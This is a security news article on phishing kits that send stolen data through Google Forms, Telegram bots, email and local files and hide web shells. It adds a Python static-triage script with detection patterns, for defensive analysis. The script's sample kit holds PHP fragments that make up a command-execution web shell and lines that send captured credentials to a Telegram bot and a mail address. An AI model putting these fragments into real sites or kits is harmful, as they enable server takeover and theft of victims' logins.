Security researchers have noticed that hackers are increasingly using legitimate services, such as Google Forms and Telegram, to collect user data stolen through phishing sites. Email remains the preferred method for malicious actors to exfiltrate stolen information, but these channels underline a new trend in the evolution of phishing kits. Alternative data collection methods help cybercriminals keep their data "safe" and start using it immediately.
Analyzing phishing kits over the past year, researchers at the cybersecurity firm Group-IB noticed that many of these tools allow the collection of stolen user data through Google Forms and Telegram. These are considered alternative methods of obtaining compromised data and account for almost 6% of the kits Group-IB analysts examined, a percentage that is likely to increase in the near future. Storing the information in a local file on the phishing resource is also one of the alternative exfiltration methods, and it accounts for the highest share of all of them.
The use of Telegram is not an unprecedented phenomenon; hackers have turned to the service because it lets them maintain their anonymity and is easy to use.
A scam-as-a-service operation used by at least 40 hacking gangs to impersonate popular classified-ad sites has also relied on Telegram bots to serve the fraudulent websites.
Stolen data collected by phishing sites that use Google Forms is sent via a POST request to an online form whose link is embedded in the phishing kit.
Group-IB told BleepingComputer that, compared to email, which can be blocked or compromised and whose logs can be lost, this is a more reliable way for the attackers to retrieve the information.
Another trend the researchers noticed was that the creators of the phishing kits engaged in double-dipping to increase their profits, adding code that copies the stream of stolen data to the kit author's own network host.
The Group-IB researchers also noticed that the creators of the phishing kits hid web shells in the code, which allow them to gain remote access to the deployed resource.
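The channels described above (email, Telegram bot, Google Forms POST, local file) and the hidden web shell are all visible as sinks in a kit's PHP source, so an analyst can triage a kit statically. The following is an added example, not Group-IB's tooling or code from any real kit; the sample kit and the `<TOKEN>`-style placeholders are constructed.

```python
"""Static triage of a phishing kit's PHP sources: which exfiltration channels
does it use, and does it carry a web shell? Added example, not Group-IB tooling.
The sample kit below is constructed; placeholders like <TOKEN> are not real."""
import re

# Exfiltration sinks named in the article: email, Telegram bot, Google Forms, local file.
CHANNEL_PATTERNS = {
    "email": re.compile(r"\bmail\s*\(", re.I),
    "telegram": re.compile(r"api\.telegram\.org/bot", re.I),
    "google_forms": re.compile(r"docs\.google\.com/forms/\S*?/formResponse", re.I),
    "local_file": re.compile(r"\b(fwrite|file_put_contents)\s*\(", re.I),
}
# Backdoor left for the kit author: a shell/eval sink fed directly from request input.
WEBSHELL_PATTERN = re.compile(
    r"\b(eval|system|passthru|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST)\b", re.I)

def classify_kit(files: dict[str, str]) -> dict[str, list[str]]:
    """Return {channel_or_'webshell': [file names where it was found]}."""
    findings: dict[str, list[str]] = {}
    for name, source in files.items():
        for channel, pattern in CHANNEL_PATTERNS.items():
            if pattern.search(source):
                findings.setdefault(channel, []).append(name)
        if WEBSHELL_PATTERN.search(source):
            findings.setdefault("webshell", []).append(name)
    return findings

def exfil_channels(findings: dict[str, list[str]]) -> list[str]:
    """Exfiltration channels only (a web shell is remote access, not exfiltration)."""
    return sorted(c for c in findings if c != "webshell")

def is_double_dipping(findings: dict[str, list[str]]) -> bool:
    """Two or more channels means the kit copies the stolen stream to a second sink."""
    return len(exfil_channels(findings)) >= 2

# Constructed sample kit (four short PHP fragments); not taken from any real kit.
SAMPLE_KIT = {
    "login.php": '<?php $m = "u=".$_POST["u"]; mail("<KIT_OWNER_MAIL>", "log", $m);'
                 ' file_put_contents("rez.txt", $m, FILE_APPEND); ?>',
    "send.php": '<?php file_get_contents("https://api.telegram.org/bot<TOKEN>/sendMessage'
                '?chat_id=<CHAT_ID>&text=".urlencode($m)); ?>',
    "post.php": '<?php $f = "https://docs.google.com/forms/d/e/<FORM_ID>/formResponse";'
                ' /* curl POST of $m to $f */ ?>',
    "cfg.php": '<?php if (isset($_GET["c"])) { system($_GET["c"]); } ?>',
}

if __name__ == "__main__":
    result = classify_kit(SAMPLE_KIT)
    for key, names in sorted(result.items()):
        print(f"{key:13s} {', '.join(names)}")
    print("double-dipping:", is_double_dipping(result))
```

Run over a real kit's directory, the same functions give the per-channel counts from which a share like the article's 6% figure is computed.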
As for the lures, the company identified more than 260 unique brands, most of them online services (30.7%: online document viewers, online shopping, streaming services and more), email clients (22.8%), and financial institutions (20%), which are the typical targets.
Users of Microsoft products, PayPal, Google and Yahoo were the top targets of these attacks, according to the researchers.
Yaroslav Kargalev, Deputy Head of the Group-IB Computer Emergency Response Team (CERT-GIB), said cybercriminals today use automation to replace blocked phishing sites faster. A direct consequence of this is the spread of "more complex social engineering which is used in large-scale attacks", says Kargalev, which requires blocking the attacker's entire infrastructure and not only the phishing sites.
Source of information: bleepingcomputer.com